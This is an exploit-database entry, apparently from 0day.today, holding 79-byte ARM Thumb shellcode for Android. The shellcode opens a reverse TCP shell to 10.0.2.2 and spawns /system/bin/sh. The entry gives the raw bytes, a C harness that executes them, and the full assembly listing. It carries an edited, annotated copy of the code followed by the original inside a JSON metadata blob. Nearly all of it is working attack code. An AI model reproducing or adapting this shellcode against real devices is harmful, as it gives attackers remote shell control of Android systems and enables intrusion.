ID 1337DAY-ID-29462
Type zdt
Reporter Neil Klopfenstein
Modified 2018-01-12T00:00:00
Description
Exploit for arm platform in category shellcode
/* This ARM Thumb shellcode connects to a given IP and port and spawns a shell.
* Intended for use with Android (hence /system/bin/sh).
*
* Connects to the provided IP and port with a shell
*
* no null bytes in the code, but does this really matter these days?
* it could be fixed with just a few instructions.
*
* Released to the public domain */
#include <stdio.h>
#include <string.h>
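/* Byte-swap a 16-bit value (network <-> host order on a little-endian host).
 * A function rather than a bare macro so the argument is evaluated exactly
 * once and the result is confined to 16 bits; the original macro left the
 * high byte of `x << 8` in the result and only looked right because the
 * caller printed it with "%hd". The macro name is kept for existing callers. */
static inline unsigned short swap16(unsigned short x)
{
    return (unsigned short)((x << 8) | (x >> 8));
}
#define SWAP16(x) swap16(x)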
/* Raw shellcode bytes. Layout, with the offsets main() indexes into:
 *   0x00  8 bytes of 32-bit ARM code that switches to Thumb
 *   0x08  48 bytes of 16-bit Thumb code (see the assembly listing below)
 *   0x38  sockaddr-style data: family, port, address (located PC-relative
 *         by the code, so it must stay at this offset)
 *   0x40  NUL-terminated shell path
 * Total length is 79 bytes; main() reads the port at 0x3a and the address
 * at 0x3c, so the trailing data must not move. */
const unsigned char sc[] = {
/* offset 0x00: enter Thumb mode (for proof of concept) */
0x01, 0x10, 0x8F, 0xE2, 0x11, 0xFF, 0x2F, 0xE1,
/* offset 0x08: 16-bit Thumb instructions follow */
0x02, 0x20, 0x01, 0x21, 0x92, 0x1A, 0x0F, 0x02, 0x19, 0x37, 0x01,
0xDF, 0x06, 0x1C, 0x08, 0xA1, 0x10, 0x22, 0x02, 0x37, 0x01, 0xDF,
0x3F, 0x27, 0x02, 0x21, 0x30, 0x1c, 0x01, 0xdf, 0x01, 0x39, 0xFB,
0xD5, 0x05, 0xA0, 0x92, 0x1a, 0x05, 0xb4, 0x69, 0x46, 0x0b, 0x27,
0x01, 0xDF, 0xC0, 0x46,
/* offset 0x38: struct sockaddr - address family 2 (AF_INET) */
0x02, 0x00,
/* offset 0x3a: port 0x1234, stored in network (big-endian) byte order */
0x12, 0x34,
/* offset 0x3c: ip 10.0.2.2 */
0x0A, 0x00, 0x02, 0x02,
/* offset 0x40: "/system/bin/sh" followed by its NUL terminator */
0x2f, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2f, 0x62, 0x69, 0x6e,
0x2f, 0x73, 0x68, 0x00
};
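/* Proof-of-concept harness: prints the shellcode size and the target
 * embedded in its sockaddr bytes (port at sc[0x3a..0x3b], address at
 * sc[0x3c..0x3f]), then jumps into sc. Returns whatever the jumped-to code
 * returns. The jump is ARM-specific and is the only purpose of this harness.
 *
 * Fixes over the original: sizeof is printed with %zu instead of %d, and the
 * port is assembled from its two bytes rather than read through an
 * (unsigned short *) cast into a char array, which is a misaligned,
 * aliasing load. */
int main(void)
{
    /* sin_port is stored big-endian (network order) regardless of host. */
    unsigned port = ((unsigned)sc[0x3a] << 8) | sc[0x3b];

    printf("shellcode=%zu bytes\n"
           "connecting to %d.%d.%d.%d:%u\n", sizeof sc,
           sc[0x3c], sc[0x3d], sc[0x3e], sc[0x3f], port);
    return ((int (*)(void))sc)();
}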
/*
* Assembly for those who are interested
*
# switch to Thumb mode (16-bit ops)
.code 32
add r1, pc, #1
bx r1
# Thumb instructions follow
.code 16
# socket(2, 1, 0)
mov r0, #2
mov r1, #1
sub r2, r2, r2
lsl r7, r1, #8
add r7, r7, #25
svc 1
# connect(r0, &addr, 16)
mov r6, r0
add r1, pc, #32
mov r2, #16
add r7, #2
svc 1
# dup2(r0, 0/1/2)
mov r7, #63
mov r1, #2
Lb:
mov r0, r6
svc 1
sub r1, #1
bpl Lb
# execve("/system/bin/sh", ["/system/bin/sh", 0], 0)
add r0, pc, #20
sub r2, r2, r2
push {r0, r2}
mov r1, sp
mov r7, #11
svc 1
# struct sockaddr
.align 2
.short 0x2
.short 0x3412 # port
.byte 10,0,2,2 # IP
.ascii "/system/bin/sh\0\0" # shell
***/
{"sourceData": "/* This ARM Thumb sc connects to a given IP and port with a shell.\r\n * Intended for use with Android (hence /system/bin/sh).\r\n *\r\n * Connects to the provided IP and port with a shell\r\n *\r\n * no null bytes in the code, but does this really matter these days?\r\n * it could be fixed with just a few instructions.\r\n *\r\n * Released to the public domain */\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n \r\n#define SWAP16(x) ((x) << 8 | ((x) >> 8))\r\n \r\nconst unsigned char sc[] = {\r\n /* Enter Thumb mode (for proof of concept) */\r\n 0x01, 0x10, 0x8F, 0xE2, 0x11, 0xFF, 0x2F, 0xE1,\r\n \r\n /* 16-bit instructions follow */\r\n 0x02, 0x20, 0x01, 0x21, 0x92, 0x1A, 0x0F, 0x02, 0x19, 0x37, 0x01,\r\n 0xDF, 0x06, 0x1C, 0x08, 0xA1, 0x10, 0x22, 0x02, 0x37, 0x01, 0xDF,\r\n 0x3F, 0x27, 0x02, 0x21, 0x30, 0x1c, 0x01, 0xdf, 0x01, 0x39, 0xFB,\r\n 0xD5, 0x05, 0xA0, 0x92, 0x1a, 0x05, 0xb4, 0x69, 0x46, 0x0b, 0x27,\r\n 0x01, 0xDF, 0xC0, 0x46,\r\n \r\n /* struct sockaddr */\r\n 0x02, 0x00,\r\n /* port: 0x1234 */\r\n 0x12, 0x34,\r\n /* ip: 10.0.2.2 */\r\n 0x0A, 0x00, 0x02, 0x02,\r\n \r\n /* \"/system/bin/sh\" */\r\n 0x2f, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2f, 0x62, 0x69, 0x6e,\r\n 0x2f, 0x73, 0x68, 0x00\r\n};\r\n \r\nint main()\r\n{\r\n printf(\"shellcode=%d bytes\\n\"\r\n \"connecting to %d.%d.%d.%d:%hd\\n\", sizeof sc,\r\n sc[0x3c], sc[0x3d], sc[0x3e], sc[0x3f],\r\n SWAP16(*((unsigned short *)(sc+0x3a))));\r\n return ((int (*)(void))sc)();\r\n}\r\n \r\n/*\r\n * Assembly for those who are interested \r\n *\r\n \r\n# switch to Thumb mode (16-bit ops) \r\n .code 32\r\n add r1, pc, #1\r\n bx r1\r\n \r\n# Thumb instructions follow\r\n .code 16\r\n \r\n# socket(2, 1, 0)\r\n mov r0, #2\r\n mov r1, #1\r\n sub r2, r2, r2\r\n lsl r7, r1, #8\r\n add r7, r7, #25\r\n svc 1\r\n \r\n# connect(r0, &addr, 16)\r\n mov r6, r0\r\n add r1, pc, #32\r\n mov r2, #16\r\n add r7, #2\r\n svc 1\r\n \r\n# dup2(r0, 0/1/2)\r\n mov r7, #63\r\n mov r1, #2\r\nLb:\r\n mov r0, 
r6\r\n svc 1\r\n sub r1, #1\r\n bpl Lb\r\n \r\n# execve(\"/system/bin/sh\", [\"/system/bin/sh\", 0], 0) \r\n add r0, pc, #20\r\n sub r2, r2, r2\r\n push {r0, r2}\r\n mov r1, sp\r\n mov r7, #11\r\n svc 1\r\n \r\n# struct sockaddr \r\n.align 2\r\n.short 0x2\r\n.short 0x3412 # port \r\n.byte 10,0,2,2 # IP\r\n.ascii \"/system/bin/sh\\0\\0\" # shell\r\n \r\n***/\n\n# 0day.today [2018-04-10] #", "description": "Exploit for amr platform in category shellcode", "sourceHref": "https://0day.today/exploit/29462", "reporter": "Neil Klopfenstein", "href": "https://0day.today/exploit/description/29462", "type": "zdt", "viewCount": 16, "references": [], "lastseen": "2018-04-10T01:46:34", "published": "2018-01-12T00:00:00", "cvelist": [], "id": "1337DAY-ID-29462", "modified": "2018-01-12T00:00:00", "title": "Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.8, "vector": "NONE", "modified": "2018-04-10T01:46:34", "rev": 2}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-33556", "1337DAY-ID-22309", "1337DAY-ID-29429"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_PIXEL_BENDER_BOF", "MSF:EXPLOIT/MULTI/FILEFORMAT/GHOSTSCRIPT_FAILED_RESTORE", "MSF:EXPLOIT/WINDOWS/HTTP/ORACLE_EVENT_PROCESSING_UPLOAD", "MSF:EXPLOIT/LINUX/HTTP/ALIENVAULT_SQLI_EXEC", "MSF:POST/FIREFOX/GATHER/HISTORY", "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_UNCOMPRESS_ZLIB_UAF", "MSF:EXPLOIT/ANDROID/LOCAL/FUTEX_REQUEUE", "MSF:EXPLOIT/WINDOWS/HTTP/COGENT_DATAHUB_COMMAND", "MSF:AUXILIARY/DOS/WIRESHARK/CAPWAP", "MSF:EXPLOIT/WINDOWS/SCADA/YOKOGAWA_BKFSIM_VHFD"]}, {"type": "nessus", "idList": ["SUSE_WIRESHARK-8659.NASL", "DEBIAN_DSA-2709.NASL", "SUSE_SU-2013-1276-1.NASL", "SUSE_11_WIRESHARK-130711.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126848"]}, {"type": "exploitdb", "idList": 
["EDB-ID:33556"]}], "modified": "2018-04-10T01:46:34", "rev": 2}, "vulnersScore": -0.8}, "immutableFields": []}